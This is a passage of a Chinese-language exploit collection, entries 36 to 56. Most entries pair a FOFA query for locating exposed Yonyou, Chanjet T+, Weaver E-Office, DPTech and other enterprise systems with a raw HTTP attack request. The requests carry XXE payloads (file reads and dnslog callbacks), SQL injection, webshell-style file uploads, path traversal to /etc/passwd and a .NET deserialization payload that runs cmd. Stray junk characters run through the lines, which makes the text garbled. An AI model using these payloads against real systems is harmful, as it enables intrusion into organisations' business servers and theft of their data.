# {* w8 ^9 G* ~* G# x* fHost: 203.25.218.166:8888
4 c8 U+ R9 Z. X! m, y7 OUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info, `3 `; T4 z% S# a3 `% K7 o
Accept-Encoding: gzip, deflate
9 t) U2 W, j C& S: W: X8 k3 q4 R } }Accept: */*
9 F( J3 O" A& L4 P; n) \3 G. tConnection: close/ Q6 l1 p. Y1 B# i& _8 z- N1 \
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA* C0 q# K! V: T* g, x" H4 ]
Content-Length: 190
2 c" V" E v: W. j3 E1 e( bContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
0 q& y% l* Z' x# s% `( u* ]5 E/ E3 |3 t& L# G' W- u% l' {* {5 U _
--fd28cb44e829ed1c197ec3bc71748df08 i- ^. R$ L U" E8 `1 X$ f* s
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"1 w) r( U4 u& ~7 n' C: E2 p
# M% b" Q: y2 Y b# V. b& N<%out.println(1111*1111);%>/ F' u, P1 K8 B! p
--fd28cb44e829ed1c197ec3bc71748df0--) ]# X9 o1 G& |: ?4 @
; l+ \0 V; q7 x1 ?' @# R' m
0 i* U2 n6 n; d; g36. 用友NC-Cloud soapFormat XXE8 {( A9 @% T. {+ U7 A
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 _( D' y1 m" j& A: M9 rPOST /uapws/soapFormat.ajax HTTP/1.1; S; Z- O1 h! u4 a) R
Host: 192.168.40.130:8989
$ G& h: g' ]* |; X$ U. L" ~0 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
! [$ L* r; r4 J; lContent-Length: 263
; }4 }" w2 C2 F3 c6 \% ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 Q( B3 {/ g7 P! i
Accept-Encoding: gzip, deflate( ?- R! j4 M3 m4 F( x$ W) u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! D- |9 k& Z8 L9 ^* X
Connection: close [3 ^# z3 A: n+ E
Content-Type: application/x-www-form-urlencoded
) Y8 d9 O. l" oUpgrade-Insecure-Requests: 1
2 l b% A9 K2 [
# n& T( G" w, _' X& Y) L4 Xmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
5 {3 M' h# W1 H: E$ Q" J
# |$ _& o$ D' k* l1 L( l: H. ~' L) `; m3 C! }& S
37. 用友NC-Cloud IUpdateService XXE+ l) d4 Z# J6 n, Z2 j% v
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
8 Y$ P% o' n* v, z( u' ePOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.14 ^4 Q3 A9 D% S% ^# n9 t+ n1 I
Host: 192.168.40.130:8989
" M4 K! P& b' w, AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36( i1 c/ |; x, _" ]& F2 d: V/ E) _7 w. r
Content-Length: 421
6 c7 X. Y5 {5 D& k/ w' e' pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
9 ^5 q3 |* F" aAccept-Encoding: gzip, deflate
% z t# M; c+ z" H8 T& TAccept-Language: zh-CN,zh;q=0.9
$ p& H% Q7 f. L C8 ^Connection: close
% N# J, }' v4 d& F. T- nContent-Type: text/xml;charset=UTF-8
: z2 Q. S& ?4 ?7 m- z YSOAPAction: urn:getResult( S* }+ D9 j: c4 V- [8 \& r
Upgrade-Insecure-Requests: 1
+ X7 l! n" R3 q* R# j/ X( ^
8 P4 W' }& I) B( Z( `7 i9 z<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
9 \2 r2 x: G: z+ H6 T0 ?, y$ y6 o5 e1 P5 E<soapenv:Header/>! D D& ^/ U- Q
<soapenv:Body>
% x# Y. g/ i d4 O<iup:getResult>! _6 N5 r' b& k- p7 K' T- ]
<!--type: string-->
- o+ O' K4 m7 B. a! P<iup:string><![CDATA[6 L1 S* Z1 ?2 T$ j5 M! q
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
" {4 [* o L( k; {# u; x; m0 ^<xxx/>]]></iup:string>8 m, `* A& a. t9 C' y
</iup:getResult>, v8 X/ {" Q( J$ q* b* k
</soapenv:Body> c5 `6 K9 }; l
</soapenv:Envelope>
8 y1 P# S! v N' S6 N6 a M. O9 p
, ~) v, \; r9 X1 r2 b) @. U% R
0 B( ~* ^# J) o4 P6 e+ i7 `5 J38. 用友U8 Cloud smartweb2.RPC.d XXE
: O$ ^2 V1 [9 x/ B1 L& ~: iFOFA:app="用友-U8-Cloud"- Y7 f: g, n& W1 G+ P; h
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1/ S$ ]$ i1 o1 ~* h
Host: 192.168.40.131:80880 ^ e5 B# i( L1 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
5 d7 N% L5 w2 k8 V7 E1 |6 i: v! ]$ Q4 PContent-Length: 260
' X# A7 J% B7 S/ L; K" ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b34 K) d8 o# K/ X( N' h1 |2 ]
Accept-Encoding: gzip, deflate
+ t) {: T7 E4 Z" U; @/ [Accept-Language: zh-CN,zh;q=0.94 Z0 i: l8 Z/ t3 F! g/ d1 q( O! Q
Connection: close
$ C' w) p* L# X* t) _Content-Type: application/x-www-form-urlencoded
) ^; f8 `1 r+ V. }2 q2 ^9 P7 m7 g, C2 \3 Q. h4 Q
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>2 s/ i8 W) Z8 e
4 _, o" O( M$ Q( S( @ |/ w/ u- k4 c9 v' t7 i& S
39. 用友U8 Cloud RegisterServlet SQL注入6 W6 v. k2 }( d" G
FOFA:title="u8c"
l5 w( L1 w2 {' qPOST /servlet/RegisterServlet HTTP/1.14 c2 {" `" B: l9 C3 q5 L! C
Host: 192.168.86.128:8089
5 `$ E- W1 ]2 A) r- O4 H; ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.366 E% j" f8 T# G/ f. P3 H% d0 c
Connection: close7 q( d+ z4 |+ B3 l0 s
Content-Length: 852 t1 U8 _# U, e$ [5 b& R
Accept: */*
" K1 t8 j, _! m) wAccept-Language: en
& j5 Y) q p2 N, BContent-Type: application/x-www-form-urlencoded0 Q5 Z' H: J5 J. J- \$ s
X-Forwarded-For: 127.0.0.1
) k, I; |; x8 h( j# AAccept-Encoding: gzip x9 |6 O8 ^7 [) Z! U7 g8 g
9 c7 V$ M. `% \8 Z7 yusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--! b) I8 r/ }8 `" z
. i4 }6 T2 Q# T
# B+ V7 c6 Y3 O: `6 W
40. 用友U8-Cloud XChangeServlet XXE
& I" B; S7 p/ E1 v: jFOFA:app="用友-U8-Cloud"' n& p4 B# q6 V9 { t
POST /service/XChangeServlet HTTP/1.1/ h: y9 P: y! r$ y! p n
Host: x.x.x.x
0 W# i. O, X9 t/ E- t( T2 K. ^0 |User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; o# c9 L5 g4 k9 k2 L
Content-Type: text/xml$ T0 F! o% Y/ S1 ~1 A9 L+ Q3 j
Connection: close' s8 S4 D# k/ p- U' q# H: ~
( \5 h4 q" l+ R! m<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
! O* p! l' @+ T: v; M. T
3 U; x% q6 w' v
. v' F0 ~% v/ u6 U6 {- q$ g7 [41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
7 T! ^- X9 I# ^& g* ?! T/ m; MFOFA:app="用友-U8-Cloud"0 Q: h6 Q3 a4 k0 q. J
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
) i7 [9 p$ B0 t1 A! QHost:
. h8 v; j$ Y8 B" k9 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 ` y5 D% t5 K; zContent-Type: application/json
, B8 j! j) a% F7 x1 C+ zAccept-Encoding: gzip+ w x8 D ~& _: B# }9 o
Connection: close
# T9 B+ @+ Z! c1 p
) x% O; b3 z) s# T- R
# i) V2 i7 a: t$ L% m42. 用友GRP-U8 SmartUpload01 文件上传( K8 k/ R; R4 Y6 V6 ~- H/ U
FOFA:app="用友-GRP-U8"
) K$ [9 e& C7 pPOST /u8qx/SmartUpload01.jsp HTTP/1.1
+ N! W- R: N9 p+ q! J; ?1 c2 WHost: x.x.x.x
3 ?8 A4 Q* t2 p% Z- IContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
M& I3 c5 @& v( Q1 zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36* B. D6 a, ^2 S& J7 X' ~! e
2 N( H9 {* z5 w- x
PAYLOAD3 D6 m" I& x- s* n" g" K2 A
' i% E& Y9 j7 o& z( {, Y' h9 }! z2 B$ F) I
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
; X7 N' D% F. {' K
( P& d2 J' R5 N" Q43. 用友GRP-U8 userInfoWeb SQL注入致RCE$ i7 F: Y2 o5 i& s: D
FOFA:app="用友-GRP-U8"
1 t4 F$ u; W, I; I+ n/ d! ZPOST /services/userInfoWeb HTTP/1.11 }3 B. D \) {( c5 a
Host: your-ip) ?/ l' |/ R1 f" Q. d- S) b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36/ w* p% |6 Z9 n: B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( _+ @- i4 P4 s) `! u# w' MAccept-Encoding: gzip, deflate
) r) H( ~. C2 m: `Accept-Language: zh-CN,zh;q=0.9
" Z7 G% y* d" T: w; e% jConnection: close
* m! h2 D3 {7 {3 T$ v( p; USOAPAction:. j' V+ O* B1 V& j& m2 }. Z
Content-Type: text/xml;charset=UTF-8
* p7 {/ ~8 L# E1 I3 E8 p5 i% f' A2 H* Q1 ~: D& ~7 ]
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">6 _4 r F6 Y( B" w. C
<soapenv:Header/>- G! L6 w$ p8 E8 z
<soapenv:Body>
1 a. j, p, M& u' y) C! @' _/ K! a7 P <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
! a6 F# R/ P+ B2 _, ] ? <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
( r2 p4 [) }% A2 S; S2 {. y </ser:getUserNameById>
- a+ X- _1 b4 `! w </soapenv:Body>
, f% {( ]6 P% o: M% ?</soapenv:Envelope>* b1 b3 Y' z! g: k& ]4 H2 L/ d
0 S$ [- M' q+ x6 r- U: t. F) Z: b, _5 a5 ]) `9 o8 g; l" h7 a
44. 用友GRP-U8 bx_dj_check.jsp SQL注入: Y7 c+ C9 u# {! I; v& P" z
FOFA:app="用友-GRP-U8"
0 @ V' P. s) f1 V* Q% l1 @: WGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
5 u, {+ I2 @, |5 \/ Y* PHost: your-ip
+ L& J" X7 Q. K0 K s1 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
* @) b9 o5 x9 ~# @& E1 k. ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# F9 A) O% l/ s' L6 g0 w/ p7 v( F
Accept-Encoding: gzip, deflate, {& F8 a5 T6 _9 l# K
Accept-Language: zh-CN,zh;q=0.93 z5 L- w9 h: V3 M
Connection: close$ \6 |% v; V B% j4 i# X
! Y7 x: `$ U2 q! \0 Z* Y+ V7 M
, C. p: { k, I$ n0 U5 a( t
45. 用友GRP-U8 ufgovbank XXE
" Y6 {. F) E& `- g2 P7 \FOFA:app="用友-GRP-U8"0 k/ E* P# o B( h: p8 g3 e
POST /ufgovbank HTTP/1.1
) X; R# I9 g- z1 d. EHost: 192.168.40.130:222
- w/ P1 Z# |5 i6 k% c3 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0/ W+ z r" y2 u( T) w% v, ^5 E3 o
Connection: close
+ Z0 Z0 g& I3 EContent-Length: 1612 ^2 q, u1 k' F3 P, A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ u u& _0 t% V" p7 F& kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 K6 `; D# q$ T; ~
Content-Type: application/x-www-form-urlencoded$ L _9 }, Y7 P: I
Accept-Encoding: gzip
0 ]1 b4 o6 ]( H% B( Z. ^: D+ l/ t& I7 j8 u' `+ H- D; \
reqData=<?xml version="1.0"?>
$ x. F9 W& z1 v1 T' h<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
5 D" N8 W& P# [3 m6 F+ j+ \- Z7 v0 v4 @( Y4 i
' q0 B, A( D& y
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
1 A" T5 i- w1 T: @) `9 I. \FOFA:app="用友-GRP-U8"
* b6 H. s- v0 u9 F) t SGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
: F0 H* T( [$ Y8 B JHost: your-ip
0 n! l7 u T9 c/ j; aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
- v7 n9 j8 d) ^ p- d* h/ P) SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ Z ?. u7 T# x5 @/ hAccept-Encoding: gzip, deflate
3 v2 w$ D4 Q5 r. l9 p$ Y! ^. rAccept-Language: zh-CN,zh;q=0.9" Q0 \0 n& f9 S' `: J
Connection: close# _4 D3 K: s5 \7 p) I+ U1 g
% J ]+ {0 w J# c4 u
- m. U; o" v" Z9 a: ~3 r
47. 用友GRP A++Cloud 政府财务云 任意文件读取
& K: F' i1 |2 b4 h I$ O1 @FOFA:body="/pf/portal/login/css/fonts/style.css"
2 g/ a; d3 x) BGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1" {+ ?$ W4 B: p
Host: x.x.x.x
6 u2 ]) J7 A& iCache-Control: max-age=0- x* {! k* V$ e, W8 X. b& j
Upgrade-Insecure-Requests: 1) j+ C4 T; n( T2 h9 L* g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& i" F1 g8 { F. I" G' F1 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* P1 r) D4 m+ t. V9 d. Q8 o
Accept-Encoding: gzip, deflate, br
( Q! C) M% a, ?Accept-Language: zh-CN,zh;q=0.9
! p, B4 V: j# N! }If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
2 l. K1 B& o! _( Q9 [# ]Connection: close" j9 D* a/ W" c' A
4 }; n- u" T! m1 m; }/ |$ p' ]( ?/ W" h/ A/ j* r: u
8 G. A" E' @: a$ v' Y% b
48. 用友U8 CRM swfupload 任意文件上传# ]8 M/ j/ L7 m+ ^ M4 \6 ^/ P8 k$ _
FOFA:title="用友U8CRM"+ g8 X# l5 V) g* x/ a7 m4 O5 Y+ E
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
! H- j( h- c, J Y1 A& x+ a2 q% LHost: your-ip
* j$ O: |. ]( gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! i+ {. [% A7 q# i2 o+ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 [) V/ [( s) p+ j, s3 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) A; k, Q' D7 E( E% r! F7 r
Accept-Encoding: gzip, deflate
# ~4 O$ u/ C" RContent-Type: multipart/form-data;boundary=----2695209672394068716424300668551 \0 g6 J8 v5 r; G$ a2 Q% H, W
------269520967239406871642430066855+ Q) N, p6 N+ [$ M- c0 @& Z! a
Content-Disposition: form-data; name="file"; filename="s.php"
& p; s$ m% O( a' O$ j: ^1231
' G! ^5 {8 q. U) x7 ^Content-Type: application/octet-stream
5 y4 B4 u* B8 z/ d& R------269520967239406871642430066855
' v, D/ j6 ~+ V. k Q0 B& ~Content-Disposition: form-data; name="upload"
2 Y* L9 u7 j1 u+ ]$ y; Jupload
0 Q( G+ @# ~1 _* \------269520967239406871642430066855--
( _. U7 g2 X& A" O$ q. z2 m
4 }& w- ^- F/ M' b( E! z, G% E# K8 M- W, A Y) q
49. 用友U8 CRM系统uploadfile.php接口任意文件上传$ D9 A0 i4 @9 [! P
FOFA:body="用友U8CRM"
* h! f/ i, e( E
9 ]8 E p( H) J2 f5 C( E+ x BPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1( ^6 ?, ?* S! _) H& h
Host: x.x.x.x
% _. y' t8 u+ l: L# dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) J. u& Z* j" m; o$ P* ~Content-Length: 3296 P9 d9 u1 V" I/ m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Q2 O T5 w! I3 ~# ~: X. oAccept-Encoding: gzip, deflate* N$ s& r% V" p+ N) L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, w0 c9 `* W7 t5 C: V% t7 v; eConnection: close/ D, f3 v e) w: l5 E) P5 H
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
) v% M& H" A+ ~3 i+ i/ K6 b4 O
/ i( l* k* E( D, [: {" z-----------------------------vvv3wdayqv3yppdxvn3w- w1 L/ a6 p J+ k& B
Content-Disposition: form-data; name="file"; filename="%s.php "
& @: j1 C! {/ U/ ?! D; B2 [Content-Type: application/octet-stream$ P" w1 E7 \7 q. I
% \' @; F5 s2 C
wersqqmlumloqa9 A% L6 W% l) R$ s: I6 Y( K0 J; s, s
-----------------------------vvv3wdayqv3yppdxvn3w
2 S H, K! z" \0 RContent-Disposition: form-data; name="upload"
* i8 k$ W! w; g5 o! X! \
# f! K7 z, L% W- pupload
" p& r0 Q1 e9 |3 O-----------------------------vvv3wdayqv3yppdxvn3w--
) c2 ^5 q( P. |- n, @3 k8 l% g8 ]# O( ] @4 }) o9 A
! {9 q9 H$ w6 b* B, v& a
http://x.x.x.x/tmpfile/updB3CB.tmp.php2 x# o* n( |, c, g" c3 P+ }) M
* E l% l3 F. H# g' D
50. QDocs Smart School 6.4.1 filterRecords SQL注入' J8 A/ k+ U6 c- C* B
FOFA:body="close closebtnmodal"
8 ?1 h8 ~; Q$ z, ePOST /course/filterRecords/ HTTP/1.1$ s. _/ I0 l/ \' ^6 x
Host: x.x.x.x
6 t6 s' D( ?$ p5 R" xUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; B$ t% b0 G! v& zConnection: close
# h7 l; q: Q* S% XContent-Length: 224
7 R# g$ h a2 f* s: f9 ^5 x0 uAccept: */*" l! ~/ d# N, M: V
Accept-Language: en
; a5 g: D% h6 X! P, iContent-Type: application/x-www-form-urlencoded4 \& ]4 t/ v/ R9 r: p) `8 g: N
Accept-Encoding: gzip& Z+ O* `+ Q+ Q0 B% d" s; c! Y
6 _1 E3 m# M p, c. F
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
0 b) \+ Z' B# @4 L; l
! u8 c$ ] k* w- Y0 B! t
* H& @. K( N4 O! R1 i' j51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入+ z8 n+ \9 R) X
FOFA:app="云时空社会化商业ERP系统" U/ y; Z8 r" L# z M4 m
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
8 s/ r" j" R# {- C9 zHost: your-ip
. ^% C7 g8 O; l/ u* s2 \! jUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
* {: P, Q- B- i' e: XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
* k. S% F+ \/ f% b4 pAccept-Encoding: gzip, deflate; c9 ?( H* h4 H3 S
Accept-Language: zh-CN,zh;q=0.90 v {! F6 o+ O
Connection: close; z- h9 [9 p8 Y+ q* J
5 s. N# t8 @7 N w9 @/ T' J- F# n. l' I3 }( c( ]: v1 |0 @
52. 泛微E-Office json_common.php sql注入8 J( a$ F2 t5 G
FOFA:app="泛微-EOffice"" q w$ S! y5 K
POST /building/json_common.php HTTP/1.1/ Q& l' H' F8 B; r
Host: 192.168.86.128:80974 {$ G% h% G( k( }. l: ?. v- O
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 s- w# ^- v: J5 w2 z m
Connection: close1 i* F7 X9 I1 T, g, U2 B# a1 c
Content-Length: 87: Z$ R7 ~) j( P1 _3 O
Accept: */*
5 W; R, f" O& t3 HAccept-Language: en
: Q. l2 J, z/ `3 N9 c$ |Content-Type: application/x-www-form-urlencoded1 O- \" C( x; @
Accept-Encoding: gzip
2 }$ h. g0 E1 e+ h3 c$ Z/ ]" W- W5 b# s, h u
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333; c/ O9 }4 f3 F3 B( ^- b7 h
) X c5 B |& G% h
# l, E$ l0 m% w* O D6 P e
53. 迪普 DPTech VPN Service 任意文件上传
% T* g, ^3 A. S& W/ `5 F7 R4 b2 wFOFA:app="DPtech-SSLVPN"" C# P% v4 Z9 j; h
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd) n' R' \0 a! g
% M1 {5 X. r7 S- A- g4 f/ ^/ P/ E1 a$ s
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
/ j( P& H& L* LFOFA:app="畅捷通-TPlus"
+ T/ A2 `/ p7 e, E; I; c第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
% W F5 ? e4 X4 u1 A, m"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"# P- g' q/ l0 y/ `& d1 A
$ @- {+ r2 I0 k; o5 X7 \
6 D% u! W+ q& [完整数据包; w0 z% N2 n7 G; m
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
& d% w8 w" E+ b7 m% \6 p4 NHost: x.x.x.x
7 }" i7 i5 @1 YUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F7 f1 w$ Q" `" h& t5 u T
Content-Length: 593
! m g7 o+ E2 m# K* d* l/ q' |4 o
/ b5 y- r: ?6 T; Q$ t- A{
. E) J$ n5 f. P' h0 S"storeID":{$ ]$ M" e8 d. K6 V$ o% t' |
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
6 q$ j P8 K: Z! K9 m$ { "MethodName":"Start",
$ C1 Q/ @" s5 t+ b: n "ObjectInstance":{$ Y. F: i7 g, V8 R# _8 k% a
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* X, d8 D/ B( ^% g- ?8 v1 J
"StartInfo":{2 E' y3 F; u5 A0 Y
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
p/ R( q8 u- m/ O( o: s "FileName":"cmd",! E. `' e9 i* y7 i" v
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
4 X- h7 y0 N O" T8 ] }, p3 N9 d6 q+ \
}
$ u( X3 [' m6 J" Z2 m }
, e, @% D6 ?) o& u/ E# M}
* N' r/ u2 u' f4 \! ~% y) b
+ F/ a; n+ Y4 j5 K& w6 Q I6 Y" e
第二步,访问如下url
) o. |$ ]" n) J8 h4 A- t/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt" ?: U& S i; H8 s: M
1 g5 D+ L/ |$ J$ p0 p4 [# }5 G9 Q2 o& A z- w! p
55. 畅捷通T+ getdecallusers信息泄露
: A, u1 e& Z/ t3 u' j3 NFOFA:app="畅捷通-TPlus"
& k" a0 Z2 ?4 e$ G V9 U5 m第一步,通过' N; ?6 g+ [+ V" E$ ]8 p
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie7 c$ e9 z; S; }* U: c2 W
第二步,利用获取到的Cookie请求
" S# D! [* m1 l% N$ O/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
& O4 \2 w' d- d& ]3 V3 K6 Z: z) e: N/ g! |- ]
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
9 J B* [6 w2 ^2 {6 S# KFOFA: app="畅捷通-TPlus"
" A+ S. C$ k2 v( t( o$ fPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
! S" ~* L8 r$ D0 q- _Host: x.x.x.x& q0 B b2 @$ ~- ?* k y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36$ t7 n8 s- z6 Y5 t4 I4 Z4 B$ t! a
Content-Type: application/json
4 J; b/ M( B! g" c' i- q5 j, M+ M' [+ z+ G& @8 x' n
